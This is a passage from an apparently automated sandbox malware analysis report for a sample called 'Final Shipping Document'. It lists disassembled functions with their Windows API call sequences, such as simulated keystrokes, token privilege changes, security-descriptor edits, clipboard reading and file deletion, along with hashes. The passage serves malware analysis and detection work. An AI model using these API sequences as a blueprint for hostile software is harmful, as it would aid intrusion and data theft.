                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                            • String ID: %d/%02d/%02d
                                                            • API String ID: 4054740463-328681919
                                                            • Opcode ID: abeafa2571e5fd95e846aa9494282903af8228281222b6e2f5c925be4c5ec07b
                                                            • Instruction ID: c72c2e1ee7cd4d64845e6dbd2c49cf0b99fb17f8a84928fffbf25588f27438f9
                                                            • Opcode Fuzzy Hash: abeafa2571e5fd95e846aa9494282903af8228281222b6e2f5c925be4c5ec07b
                                                            • Instruction Fuzzy Hash: 2512F171620214ABEB288F65CC49FBE7BF8EF49310F144169F525EB2E1DB74AA41CB50
                                                            Function 00BBF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00BBF998
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BFF474
                                                            • IsIconic.USER32(00000000), ref: 00BFF47D
                                                            • ShowWindow.USER32(00000000,00000009), ref: 00BFF48A
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BFF494
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4AA
                                                            • GetCurrentThreadId.KERNEL32 ref: 00BFF4B1
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFF4BD
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4CE
                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFF4D6
                                                            • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00BFF4DE
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BFF4E1
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF4F6
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF501
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF50B
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF510
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF519
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF51E
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFF528
                                                            • keybd_event.USER32(00000012,00000000), ref: 00BFF52D
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BFF530
                                                            • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00BFF557
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 4125248594-2988720461
                                                            • Opcode ID: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                            • Instruction ID: 1ca2853e8765c7c3d576de6e263bbbf33c239e56d331c7fe2371393aed35b0b5
                                                            • Opcode Fuzzy Hash: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                            • Instruction Fuzzy Hash: FD311E71A50219BBEB216BB55C8AFBF7EACEB44B50F100065FA01F61D1C6B19910ABA0
                                                            Function 00C01201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                              • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                              • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C01286
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C012A8
                                                            • CloseHandle.KERNEL32(?), ref: 00C012B9
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C012D1
                                                            • GetProcessWindowStation.USER32 ref: 00C012EA
                                                            • SetProcessWindowStation.USER32(00000000), ref: 00C012F4
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C01310
                                                              • Part of subcall function 00C010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                              • Part of subcall function 00C010BF: CloseHandle.KERNEL32(?,?,00C011FC), ref: 00C010E9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                            • String ID: $default$winsta0
                                                            • API String ID: 22674027-1027155976
                                                            • Opcode ID: 3e58d34f736ec69daa267d072fae251c82be37ac81154fb80bbe2ab028170df8
                                                            • Instruction ID: da30c6110964fbde314fec59c962c071aab0310094489e4c09208dde435f6f49
                                                            • Opcode Fuzzy Hash: 3e58d34f736ec69daa267d072fae251c82be37ac81154fb80bbe2ab028170df8
                                                            • Instruction Fuzzy Hash: DF818971910209AFDF219FA5DC89FEEBBB9EF04704F184129FD20B61A0D7758A54CB21
                                                            Function 00C00B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                              • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                              • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                              • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                              • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00BCC
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00C00
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00C17
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C00C51
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00C6D
                                                            • GetLengthSid.ADVAPI32(?), ref: 00C00C84
                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00C8C
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C00C93
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00CB4
                                                            • CopySid.ADVAPI32(00000000), ref: 00C00CBB
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00CEA
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00D0C
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00D1E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D45
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D4C
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D55
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D5C
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D65
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D6C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00D78
                                                            • HeapFree.KERNEL32(00000000), ref: 00C00D7F
                                                              • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                              • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                              • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 4175595110-0
                                                            • Opcode ID: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                            • Instruction ID: d61d9da36caa3073739ab7af1eb5b95033a4706bd4f4773ca92157847cb0242d
                                                            • Opcode Fuzzy Hash: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                            • Instruction Fuzzy Hash: 3771497690020AABDF10DFA4DC84FAEBBB9BF04310F254519E925B6291D775AA05CBB0
                                                            Function 00C1EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(00C3CC08), ref: 00C1EB29
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C1EB37
                                                            • GetClipboardData.USER32(0000000D), ref: 00C1EB43
                                                            • CloseClipboard.USER32 ref: 00C1EB4F
                                                            • GlobalLock.KERNEL32(00000000), ref: 00C1EB87
                                                            • CloseClipboard.USER32 ref: 00C1EB91
                                                            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C1EBBC
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00C1EBC9
                                                            • GetClipboardData.USER32(00000001), ref: 00C1EBD1
                                                            • GlobalLock.KERNEL32(00000000), ref: 00C1EBE2
                                                            • GlobalUnlock.KERNEL32(00000000,?), ref: 00C1EC22
                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C1EC38
                                                            • GetClipboardData.USER32(0000000F), ref: 00C1EC44
                                                            • GlobalLock.KERNEL32(00000000), ref: 00C1EC55
                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C1EC77
                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1EC94
                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1ECD2
                                                            • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00C1ECF3
                                                            • CountClipboardFormats.USER32 ref: 00C1ED14
                                                            • CloseClipboard.USER32 ref: 00C1ED59
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                            • String ID:
                                                            • API String ID: 420908878-0
                                                            • Opcode ID: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                            • Instruction ID: d55eae1b019832b8122d72694fa83212786bd537139e8593c099aba2e33818d7
                                                            • Opcode Fuzzy Hash: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                            • Instruction Fuzzy Hash: 0F61C1352082019FD300EF24D889FAE77E4AF86714F08455DF856E72A1DB31DA85DB62
                                                            Function 00C1698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C169BE
                                                            • FindClose.KERNEL32(00000000), ref: 00C16A12
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A4E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A75
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16AB2
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16ADF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                            • API String ID: 3830820486-3289030164
                                                            • Opcode ID: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                            • Instruction ID: 6f94f553603abdc589d72ce8bb3b7d927a87dc74b15f8ec48a4fe8eb343acf1e
                                                            • Opcode Fuzzy Hash: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                            • Instruction Fuzzy Hash: 67D15DB2508300AFC310EBA4CC91EAFB7ECAF89704F04495DF599D6191EB75DA48DB62
                                                            Function 00C19642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C19663
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C196A1
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00C196BB
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C196D3
                                                            • FindClose.KERNEL32(00000000), ref: 00C196DE
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C196FA
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C1974A
                                                            • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C19768
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C19772
                                                            • FindClose.KERNEL32(00000000), ref: 00C1977F
                                                            • FindClose.KERNEL32(00000000), ref: 00C1978F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                            • Instruction ID: 3a9a0b60acf1f460e8aaf9ce011ecd172f3d2155b78eb80ec440f34726d194ce
                                                            • Opcode Fuzzy Hash: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                            • Instruction Fuzzy Hash: 4E31D332500219ABDB24AFB4DC99FDE77ACDF4A320F104165F815E20E0DB31DE809B60
                                                            Function 00C1979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00C197BE
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C19819
                                                            • FindClose.KERNEL32(00000000), ref: 00C19824
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C19840
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C19890
                                                            • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C198AE
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C198B8
                                                            • FindClose.KERNEL32(00000000), ref: 00C198C5
                                                            • FindClose.KERNEL32(00000000), ref: 00C198D5
                                                              • Part of subcall function 00C0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C0DB00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                            • Instruction ID: f943555f709fbd82b222a49a15144ef98f9a11497e6672cf628cab04d38663fb
                                                            • Opcode Fuzzy Hash: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                            • Instruction Fuzzy Hash: 283185325406196EEB20EFB4EC98BDE77ACDF47320F144165E824A21E0DB31DAC5EB64
                                                            Function 00C18195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 00C18257
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C18267
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C18273
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C18310
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18324
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18356
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C1838C
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C18395
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                            • String ID: *.*
                                                            • API String ID: 1464919966-438819550
                                                            • Opcode ID: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
                                                            • Instruction ID: db47ca176db92781213603e950349ff63ab42132d4214fbf9331bb1952778c32
                                                            • Opcode Fuzzy Hash: e5c3d461f58e39a9e65955bcfaebec0e837790dd2df9ab95f0f9138bd72e6eee
                                                            • Instruction Fuzzy Hash: 2C616D725083059FC710EF64C894A9EB3E8FF8A310F44495EF99997251DB31EA49CB92
                                                            Function 00C0D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                              • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C0D122
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C0D1DD
                                                            • MoveFileW.KERNEL32(?,?), ref: 00C0D1F0
                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D20D
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D237
                                                              • Part of subcall function 00C0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C0D21C,?,?), ref: 00C0D2B2
                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00C0D253
                                                            • FindClose.KERNEL32(00000000), ref: 00C0D264
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 1946585618-1173974218
                                                            • Opcode ID: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                            • Instruction ID: 0334b646f60fef2b8c44047477ce6e5d8109348afdacb6ffa31594f4d0c9262b
                                                            • Opcode Fuzzy Hash: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                            • Instruction Fuzzy Hash: A5617D3180511DABCF05EBE0DA92AEEB7B5AF15340F2481A5E41277192EB31AF09DB60
                                                            Function 00C1ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                            • Instruction ID: ffd54b4d2ac901481512ea035174049497cab296731831480a714cf788bd424d
                                                            • Opcode Fuzzy Hash: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                            • Instruction Fuzzy Hash: 8641AE35204611AFD310DF25E889F5ABBE1EF45318F14C099E829DB762C775ED81CB90
                                                            Function 00C0E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                              • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                              • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00C0E932
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
